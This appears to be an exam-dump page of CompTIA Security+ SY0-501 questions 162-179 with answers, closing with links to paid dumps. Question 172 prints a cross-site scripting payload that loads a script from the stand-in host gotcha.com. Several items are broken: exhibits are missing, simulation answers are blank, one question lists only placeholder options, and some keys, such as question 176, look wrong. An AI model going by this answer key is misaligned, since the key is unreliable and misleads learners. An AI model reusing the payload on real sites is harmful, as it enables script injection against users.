[Sep-2021] SYO-501 Dumps Full Questions - Security+ Exam Study Guide
Exam Questions and Answers for SYO-501 Study Guide
NEW QUESTION 162
Which of the following is an example of federated access management?
- A. Implementing a AAA framework for network access
- B. Applying a new user account with a complex password
- C. Windows passing user credentials on a peer-to-peer network
- D. Using a popular website login to provide access to another website
Explanation
Answer: D
NEW QUESTION 163
A company recently implemented a new security system. In the course of configuration, the security administrator adds the following entry:
#Whitelist USB\VID_13FE&PID_4127&REV_0100
Which of the following security technologies is MOST likely being configured?
- A. Data execution prevention
- B. Application whitelisting
- C. HIDS
- D. Removable media control
Answer: D
NEW QUESTION 164
An organization is comparing and contrasting migration from its standard desktop configuration to the newest version of the platform. Before this can happen, the Chief Information Security Officer (CISO) voices the need to evaluate the functionality of the newer desktop platform to ensure interoperability with existing software in use by the organization. In which of the following principles of architecture and design is the CISO engaging?
- A. Baselining
- B. Dynamic analysis
- C. Waterfalling
- D. Change management
Answer: D
NEW QUESTION 165
A company is developing a new secure technology and requires computers being used for development to be isolated. Which of the following should be implemented to provide the MOST secure environment?
- A. A bastion host
- B. A honeypot residing in a DMZ
- C. An air gapped computer network
- D. An ad hoc network with NAT
- E. A perimeter firewall and IDS
Answer: C
Explanation:
Explanation
NEW QUESTION 166
New magnetic locks were ordered for an entire building. In accordance with company policy, employee
safety is the top priority.
In case of a fire where electricity is cut, which of the following should be taken into consideration when
installing the new locks?
- A. Redundancy
- B. Fail secure
- C. Fault tolerance
- D. Fail safe
Answer: D
NEW QUESTION 167
A company's AUP requires:
- Passwords must meet complexity requirements.
- Passwords are changed at least once every six months.
- Passwords must be at least eight characters long.
An auditor is reviewing the following report:
Which of the following controls should the auditor recommend to enforce the AUP?
- A. Account lockout thresholds
- B. Account recovery
- C. Password expiration
- D. Prohibit password reuse
Answer: C
NEW QUESTION 168
A security analyst observes the following events in the logs of an employee workstation:
Given the information provided, which of the following MOST likely occurred on the workstation?
- A. The SIEM log agent was not turned properly and reported a false positive.
- B. Application whitelisting controls blocked an exploit payload from executing.
- C. Antivirus software found and quarantined three malware files.
- D. Automatic updates were initiated but failed because they had not been approved.
Answer: B
NEW QUESTION 169
A security analyst is testing both Windows and Linux systems for unauthorized DNS zone transfers within a LAN on comptia.org from example.org. Which of the following commands should the security analyst use?
(Select two.)
- A. Option F
- B. Option A
- C. Option D
- D. Option C
- E. Option B
- F. Option E
Answer: B,D
NEW QUESTION 170
A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.
INSTRUCTIONS
Please click on the below items on the network diagram and configure them accordingly:
* WAP
* DHCP Server
* AAA Server
* Wireless Controller
* LDAP Server
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION 171
You have been tasked with designing a security plan for your company. Drag and drop the appropriate security controls on the floor plan.
Instructions: All objects must be used and all place holders must be filled. Order does not matter. When you have completed the simulation, please select the Done button to submit.
Answer:
Explanation:
Explanation:
Cable locks - Adding a cable lock between a laptop and a desk prevents someone from picking it up and walking away Proximity badge + reader Safe is a hardware/physical security measure Mantrap can be used to control access to sensitive areas. CCTV can be used as video surveillance.
Biometric reader can be used to control and prevent unauthorized access. Locking cabinets can be used to protect backup media, documentation and other physical artifacts.
NEW QUESTION 172
A security engineer is analyzing the following line of JavaScript code that was found in a comment field on a web forum, which was recently involved in a security breach:
<script
src=http://gotcha.com/hackme.js
></script>
Given the line of code above, which of the following BEST represents the attack performed during the breach?
- A. DDoS
- B. Dos
- C. XSS
- D. CSRF
Answer: C
NEW QUESTION 173
A network administrator is trying to provide the most resilient hard drive configuration in a server. With five hard drives which of the following is the MOST fault-tolerant configuration?
- A. RAID 1
- B. RAID 10
- C. RAID 6
- D. RAID 5
Answer: C
NEW QUESTION 174
An organization has implemented a two-step verification process to protect user access to data that is stored in the cloud. Each employee now uses an email address or mobile number to receive a code to access the data.
Which of the following authentication methods did the organization implement?
- A. Push notification
- B. HOTP
- C. Static code
- D. Token key
Answer: B
NEW QUESTION 175
Joe, a contractor, is hired by a firm to perform a penetration test against the firm's infrastructure.
When conducting the scan, he receives only the network diagram and the network list to scan against the network.
Which of the following scan types is Joe performing?
- A. Authenticated
- B. White box
- C. Gray box
- D. Automated
Answer: C
NEW QUESTION 176
A security analyst just discovered that developers have access to production systems that are used for deployment and troubleshooting One developer, who recently left the company abused this access to obtain sensitive information Which of the following is the BEST account management strategy to prevent this from reoccurring?
- A. Set up time-of-day restrictions that prevent access to production systems during business hours
- B. Configure jump boxes and prevent access to production from any other system
- C. Modify the AUP to prohibit developers from accessing production systems
- D. Implement multifactor authentication for accessing production systems
- E. Perform an account review and ensure least privilege is being followed for production access
Answer: C
NEW QUESTION 177
While reviewing the monthly internet usage it is noted that there is a large spike in traffic classified as "unknown" and does not appear to be within the bounds of the organizations Acceptable Use Policy.
Which of the following tool or technology would work BEST for obtaining more information on this traffic?
- A. Protocol analyzer
- B. Firewall logs
- C. IDS logs
- D. Increased spam filtering
Answer: C
NEW QUESTION 178
Two users need to send each other emails over unsecured channels. The system should support the principle of non-repudiation. Which of the following should be used to sign the user's certificates?
- A. CRL
- B. RA
- C. CSR
- D. CA
Answer: D
NEW QUESTION 179
......
CompTIA Security+ Certification Exam Free Update With 100% Exam Passing Guarantee: https://www.ipassleader.com/CompTIA/SYO-501-practice-exam-dumps.html
Real Exam Questions & Answers - CompTIA SYO-501 Dump is Ready: https://drive.google.com/open?id=1rDtr-wlB7By-0gBVLINCL51GVl4wJIkf